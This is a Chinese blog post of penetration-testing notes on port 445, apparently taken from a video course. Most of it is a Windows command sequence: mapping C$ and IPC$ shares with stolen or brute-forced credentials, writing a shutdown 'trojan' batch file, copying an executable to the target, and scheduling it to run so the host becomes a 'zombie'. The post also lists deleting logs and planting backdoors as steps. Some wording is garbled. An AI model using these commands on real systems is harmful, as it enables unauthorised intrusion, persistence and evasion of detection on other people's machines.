笔记
由于太困,文章涉及的软件想要私聊(其实网上都有,想找都能找到)
还有有的软件下载谷歌浏览器权限不足(这个问题我也不知道是不是叫这个)
解决:谷歌里面安装迅雷插件,或者换个浏览器下载或者复制下载连接在迅雷里面下载;
太困了,明天再写吧!1!!!
1.授权
2.信息收集(nslookup whois)
3.扫描漏洞
namp扫描IP 范围 端口 80 {IIS,apache,什么网站,软件 漏洞})scanpot软件扫描;
高级扫描:如IIS漏洞 2003-iis6.0 2008iis7.0
扫描网站漏洞(十大网站漏洞 )
4.漏洞利用
5.提权(shell环境命令控制权,桌面环境,最高权限)
=======删库跑路
6.毁尸灭迹(删除日志)
7.留后门
8.渗透测试报告(漏洞,端口)=》安全加固方案
手工测试端口号开放:
telnet IP地址 测试端口
映射共享文件夹,在本地电脑F盘
net use f: \10.1.1.2\share ROOT /user:administrator
net use f: \10.1.1.2\share /del
md 文件夹(创建文件夹)
w漏洞利用之IPC$:
net use f: \10.1.1.2\share 密码 /user:用户名
net use f: /del
net use * /del
net use f: \10.1.1.2\c$ 密码 /user:用户名
net use f: \10.1.1.2\ipc$ 密码 /user:用户名
暴力激活成功教程系统密码之445:
445漏洞利用之一IPC$:
1、scanport 扫描445端口
2、进行暴力激活成功教程:NTscan
net use f: \10.1.1.2\ipc$ 密码 /user:用户名
net use f: \10.1.1.2\share 密码 /user:用户
net use * /del
net use * /del
net use f: \10.1.1.2\c$ 密码 /user:用户名
4、制作木马
copy con haha.bat
shutdown -s -t 100
^z
拷贝在f:盘
copy haha.bat f:
5、植入木马(留后门)
copy d:\heihei.exe \10.1.1.2\c$
6、设计计划任务自动执行木马:
net time \10.1,1.2
at \10.1.1.2 11:11 “c:\heihei.exe”
7、等待肉鸡上线
参考文献:
千锋教育(https://www.bilibili.com/video/BV1i7411G7vm)
今天的文章渗透测试(445端口)分享到此就结束了,感谢您的阅读,如果确实帮到您,您可以动动手指转发给其他人。
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
如需转载请保留出处:https://bianchenghao.cn/25822.html